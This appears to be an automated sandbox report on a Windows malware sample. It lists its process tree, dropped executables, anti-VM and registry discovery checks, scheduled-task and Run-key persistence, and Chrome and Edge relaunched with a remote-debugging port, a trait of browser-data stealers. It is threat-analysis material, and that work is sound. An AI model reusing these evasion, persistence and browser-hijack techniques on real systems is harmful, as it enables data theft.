9e8de64c90.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 257062250c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0d668332f1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 2f701a17dc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7f488eac68.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe -
Checks processor information in registry 2 TTPs 22 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7nSTXG6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 19ec845a59.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 19ec845a59.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5371839e91.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7nSTXG6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 14349890e7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5371839e91.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 14349890e7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3200 timeout.exe 4128 timeout.exe -
Enumerates system info in registry 2 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 4308 taskkill.exe 1232 taskkill.exe 3484 taskkill.exe 3208 taskkill.exe 2132 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846261765289492" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4544 schtasks.exe 4256 schtasks.exe 6076 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4964 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe 4964 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe 4708 skotes.exe 4708 skotes.exe 5004 lwtLxxH.exe 5004 lwtLxxH.exe 5004 lwtLxxH.exe 5004 lwtLxxH.exe 2536 7nSTXG6.exe 2536 7nSTXG6.exe 2536 7nSTXG6.exe 2536 7nSTXG6.exe 2536 7nSTXG6.exe 2536 7nSTXG6.exe 3232 chrome.exe 3232 chrome.exe 740 ebp51gY.exe 740 ebp51gY.exe 4548 skotes.exe 4548 skotes.exe 2536 7nSTXG6.exe 2536 7nSTXG6.exe 2708 powershell.exe 2708 powershell.exe 740 ebp51gY.exe 740 ebp51gY.exe 740 ebp51gY.exe 740 ebp51gY.exe 2536 7nSTXG6.exe 2536 7nSTXG6.exe 3704 msedge.exe 4856 msedge.exe 3704 msedge.exe 4856 msedge.exe 3704 msedge.exe 3704 msedge.exe 1596 msedge.exe 1596 msedge.exe 2108 Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE 2108 Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE 2604 powershell.exe 2604 powershell.exe 2604 powershell.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 2660 powershell.exe 2660 powershell.exe 2660 powershell.exe 2108 Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE 2108 Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE 2108 Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE 3832 f93ba905bf.exe 3832 f93ba905bf.exe 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 2536 7nSTXG6.exe 2536 7nSTXG6.exe 2788 483d2fa8a0d53818306efeb32d3.exe 2788 483d2fa8a0d53818306efeb32d3.exe 2536 7nSTXG6.exe 2536 7nSTXG6.exe 232 9e8de64c90.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
pid Process 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1912 chrome.exe 1912 chrome.exe 1912 chrome.exe 1912 chrome.exe 5160 msedge.exe 5160 msedge.exe 5160 msedge.exe 5160 msedge.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
description pid Process Token: SeDebugPrivilege 5004 lwtLxxH.exe Token: SeShutdownPrivilege 3232 chrome.exe Token: SeCreatePagefilePrivilege 3232 chrome.exe Token: SeShutdownPrivilege 3232 chrome.exe Token: SeCreatePagefilePrivilege 3232 chrome.exe Token: SeShutdownPrivilege 3232 chrome.exe Token: SeCreatePagefilePrivilege 3232 chrome.exe Token: SeShutdownPrivilege 3232 chrome.exe Token: SeCreatePagefilePrivilege 3232 chrome.exe Token: SeShutdownPrivilege 3232 chrome.exe Token: SeCreatePagefilePrivilege 3232 chrome.exe Token: SeShutdownPrivilege 3232 chrome.exe Token: SeCreatePagefilePrivilege 3232 chrome.exe Token: SeShutdownPrivilege 3232 chrome.exe Token: SeCreatePagefilePrivilege 3232 chrome.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 4696 powershell.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 2108 Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 4632 4604003cca.exe Token: SeShutdownPrivilege 1912 chrome.exe Token: SeCreatePagefilePrivilege 1912 chrome.exe Token: SeShutdownPrivilege 1912 chrome.exe Token: SeCreatePagefilePrivilege 1912 chrome.exe Token: SeShutdownPrivilege 1912 chrome.exe Token: SeCreatePagefilePrivilege 1912 chrome.exe Token: SeDebugPrivilege 3208 taskkill.exe Token: SeShutdownPrivilege 1912 chrome.exe Token: SeCreatePagefilePrivilege 1912 chrome.exe Token: SeShutdownPrivilege 1912 chrome.exe Token: SeCreatePagefilePrivilege 1912 chrome.exe Token: SeDebugPrivilege 2132 taskkill.exe Token: SeDebugPrivilege 4308 taskkill.exe Token: SeDebugPrivilege 1232 taskkill.exe Token: SeDebugPrivilege 3484 taskkill.exe Token: SeDebugPrivilege 1316 firefox.exe Token: SeDebugPrivilege 1316 firefox.exe Token: SeDebugPrivilege 2292 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4964 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3232 chrome.exe 3392 1592ba5686.exe 3392 1592ba5686.exe 3392 1592ba5686.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1596 msedge.exe 1912 chrome.exe 1912 chrome.exe 1912 chrome.exe 1912 chrome.exe 1912 chrome.exe 1912 chrome.exe 1912 chrome.exe 1912 chrome.exe 1912 chrome.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 3392 1592ba5686.exe 3392 1592ba5686.exe 3392 1592ba5686.exe 828 2f701a17dc.exe 828 2f701a17dc.exe 828 2f701a17dc.exe 828 2f701a17dc.exe 828 2f701a17dc.exe 828 2f701a17dc.exe 828 2f701a17dc.exe 932 26d7898bf1.exe 932 26d7898bf1.exe 932 26d7898bf1.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 1316 firefox.exe 828 2f701a17dc.exe 828 2f701a17dc.exe 828 2f701a17dc.exe 828 2f701a17dc.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1316 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4964 wrote to memory of 4708 4964 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe 91 PID 4964 wrote to memory of 4708 4964 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe 91 PID 4964 wrote to memory of 4708 4964 1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe 91 PID 4708 wrote to memory of 5004 4708 skotes.exe 93 PID 4708 wrote to memory of 5004 4708 skotes.exe 93 PID 4708 wrote to memory of 2536 4708 skotes.exe 96 PID 4708 wrote to memory of 2536 4708 skotes.exe 96 PID 4708 wrote to memory of 2536 4708 skotes.exe 96 PID 2536 wrote to memory of 3232 2536 7nSTXG6.exe 103 PID 2536 wrote to memory of 3232 2536 7nSTXG6.exe 103 PID 3232 wrote to memory of 208 3232 chrome.exe 104 PID 3232 wrote to memory of 208 3232 chrome.exe 104 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 3168 3232 chrome.exe 105 PID 3232 wrote to memory of 5088 3232 chrome.exe 106 PID 3232 wrote to memory of 5088 3232 chrome.exe 106 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 PID 3232 wrote to memory of 1444 3232 chrome.exe 107 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe"C:\Users\Admin\AppData\Local\Temp\1baf2b57c08a376e47f85ccd5fbd198f2ad0a45e5df0a9c2ea1c4454ad69523e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff98744cc40,0x7ff98744cc4c,0x7ff98744cc585⤵PID:208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1952 /prefetch:25⤵PID:3168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2176,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2212 /prefetch:35⤵PID:5088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2280,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2492 /prefetch:85⤵PID:1444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:15⤵
- Uses browser remote debugging
PID:212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:15⤵
- Uses browser remote debugging
PID:876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3660,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:15⤵
- Uses browser remote debugging
PID:2020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4724 /prefetch:85⤵PID:3708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3664,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4816 /prefetch:85⤵PID:948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4816 /prefetch:85⤵PID:4860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4884,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4940 /prefetch:85⤵PID:1352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4624,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4852 /prefetch:85⤵PID:2244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,17262116589955190350,16095646518645333091,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5068 /prefetch:85⤵PID:2252
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1596 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9794946f8,0x7ff979494708,0x7ff9794947185⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,1395403121855923071,7841064476941695622,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:25⤵PID:2648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,1395403121855923071,7841064476941695622,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:4856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,1395403121855923071,7841064476941695622,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:85⤵PID:2748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,1395403121855923071,7841064476941695622,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:15⤵
- Uses browser remote debugging
PID:4840
-
-
